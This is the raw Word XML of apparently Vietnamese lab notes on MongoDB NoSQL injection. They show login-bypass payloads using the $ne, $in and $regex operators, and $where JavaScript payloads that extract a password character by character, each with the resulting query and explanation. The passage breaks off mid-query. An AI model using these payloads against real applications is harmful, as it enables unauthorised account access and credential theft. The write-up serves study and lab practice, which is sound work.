    </w:p>
    <w:p w14:paraId="43AF5C8C" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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Payload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thử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nghiệm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97E323D" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>{"username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":{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"$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ne":"invalid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"},"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password":"peter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"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A1DA9" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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 xml:space="preserve">MongoDB query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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130AB85" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db.users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findOne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({ username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{ $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ne: "invalid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" }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, password: "peter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" }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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5330DFF6" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>$ne = not equal (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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CC79F" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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username !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 xml:space="preserve">= "invalid"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luôn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đúng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“invalid”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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652DDC7" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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password "peter"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query match → login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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5412EBEA" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00000000" w:rsidP="00D32B58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pict w14:anchorId="6165CC3E">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F15AED" w14:textId="303EB984" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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3. Bypass login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cả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username &amp; password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A3E04" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A0C79" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>{"username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":{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"$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ne":"invalid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"},"password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":{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"$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ne":"invalid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"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D62D0" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71748BC5" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db.users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findOne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({ username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{ $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ne: "invalid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" }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 xml:space="preserve">, password: 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{ $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ne: "invalid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" }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 xml:space="preserve"> });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22E5FA" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>username !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 xml:space="preserve">= "invalid" </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD6065" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>password !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 xml:space="preserve">= "invalid" </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r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password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"invalid").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7BB7C" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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: query match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một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user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bất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kỳ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DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCB1F2" w14:textId="720D7467" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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 xml:space="preserve">MongoDB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→ attacker login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admin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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0380B4" w14:textId="34D792A8" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B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Nhắm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mục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tiêu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tài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khoản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cụ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thể</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="746D79E4" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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lastRenderedPageBreak/>
        <w:t>Nếu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attacker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username admin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payload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tinh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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA0D73" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>{"username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":{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"$in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":[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"admin","administrator","superadmin"]},"password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":{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"$ne":""}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C12C4B9" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711E623" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B5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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db.users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findOne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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6D384" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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 xml:space="preserve">  username: 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{ $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in: ["admin","administrator","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superadmin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] }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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD19BC" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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 xml:space="preserve">  password: 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{ $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ne: "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" }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="613136A2" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809D013" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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 xml:space="preserve">$in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username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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B803FF7" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>password !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= "" (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rỗng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) →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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222E97B" w14:textId="77777777" w:rsidR="00D32B58" w:rsidRPr="00BC7C15" w:rsidRDefault="00D32B58" w:rsidP="00D32B58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account admin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DB → attacker login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admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43691E" w14:textId="256B76F9" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F0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lab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ta 1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login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B429460" w14:textId="0EF4B965" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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791941" wp14:editId="77F20239">
            <wp:extent cx="5943600" cy="1764030"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="113279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941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5A8C" w14:textId="5349B045" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F0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dung burp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gì</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E98A0AF" w14:textId="0EA25ACF" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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828055" wp14:editId="44041EE8">
            <wp:extent cx="5943600" cy="2860675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165634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426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15FB" w14:textId="7B69F1DE" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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username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passwd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code 302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8D3B55" w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BC1818" w14:textId="0ED982A8" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="008D3B55" w:rsidP="00236F0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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8D219" w14:textId="77777777" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="008D3B55" w:rsidP="008D3B55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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0F787" w14:textId="77777777" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="008D3B55" w:rsidP="008D3B55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 xml:space="preserve">  "username": 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{ "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$in": ["admin","administrator","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superadmin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] }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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B4C5D8" w14:textId="77777777" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="008D3B55" w:rsidP="008D3B55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 xml:space="preserve">  "password": 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{ "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$ne": "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" }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="543CAF61" w14:textId="3071DFD8" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="008D3B55" w:rsidP="008D3B55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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F5BC5" w14:textId="31844AD2" w:rsidR="008D3B55" w:rsidRPr="00BC7C15" w:rsidRDefault="00B175DD" w:rsidP="008D3B55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3729B7" wp14:editId="39A71F90">
            <wp:extent cx="5943600" cy="2697480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="115890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042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BECD" w14:textId="17B01852" w:rsidR="00B175DD" w:rsidRPr="00BC7C15" w:rsidRDefault="00B175DD" w:rsidP="008D3B5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lastRenderedPageBreak/>
        <w:t>Kết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vẻ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k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tại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37244F2F" w14:textId="0CBC3DFF" w:rsidR="00C81736" w:rsidRPr="00BC7C15" w:rsidRDefault="00C81736" w:rsidP="00C8173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administrator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adm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ở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r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>operator $regex</w:t>
      </w:r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username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adm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password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rỗng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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BCA3B" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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>Payload: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639EE55" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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 xml:space="preserve">  "username": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077915DD" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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 xml:space="preserve">    "$regex": "^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adm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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4870BD" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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 xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519D801" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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 xml:space="preserve">  "password": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8073EF" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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 xml:space="preserve">    "$ne": ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC5BEF" w14:textId="77777777" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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1741F228" w14:textId="0B8FBDF0" w:rsidR="00236F00" w:rsidRPr="00BC7C15" w:rsidRDefault="00236F00" w:rsidP="00236F00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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD8030D" w14:textId="49D05304" w:rsidR="00C81736" w:rsidRPr="00BC7C15" w:rsidRDefault="00C81736" w:rsidP="00C81736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0D9C8A" wp14:editId="4538B7A2">
            <wp:extent cx="5943600" cy="2636520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18017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25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1336" w14:textId="77777777" w:rsidR="00B175DD" w:rsidRPr="00BC7C15" w:rsidRDefault="00B175DD" w:rsidP="00C81736">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2404AC" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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Trích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xuất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MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7AE8D4" w14:textId="3F8BC90B" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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Ứng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bình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thường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C42F7F0" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E93D2" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>https://insecure-website.com/user/lookup?username=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E9ACC4" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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lastRenderedPageBreak/>
        <w:t>Ứng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query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095AE01" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{ "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$where": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'admin'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" }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="094104D4" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">MongoDB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document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collection users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giữ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document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username == 'admin'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495F541" w14:textId="5D1A203E" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26B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2. Khi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injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EEB125" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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không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được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escape/sanitize</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, attacker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chèn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JavaScript.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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E913D" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26B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7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E69EDD" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[0] == 'a' || 'a'=='b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026945A0" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">Query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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0CD97" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBD1C2" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">  "$where": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[0] == 'a' || 'a'=='b'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AAB6ED" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D386576" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26B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Ý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nghĩa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79935A9" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'admin' →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user admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC6D69" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[0] == 'a' →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password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'a'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE26E5" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">|| 'a'=='b' →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syntax error,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false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56D930" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r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query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(document admin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) →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password[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0] = 'a'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r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→ 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password[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0] ≠ 'a'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B309F" w14:textId="79CF9025" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA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brute-force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exfiltrate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password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79553294" w14:textId="7F56C284" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26B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Dùng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match(</w:t>
      </w:r>
      <w:proofErr w:type="gram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để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dò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</w:p>
    <w:p w14:paraId="54824A68" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D4E53" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password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.match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(/\d/) || 'a'=='b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D62981F" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72D285" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
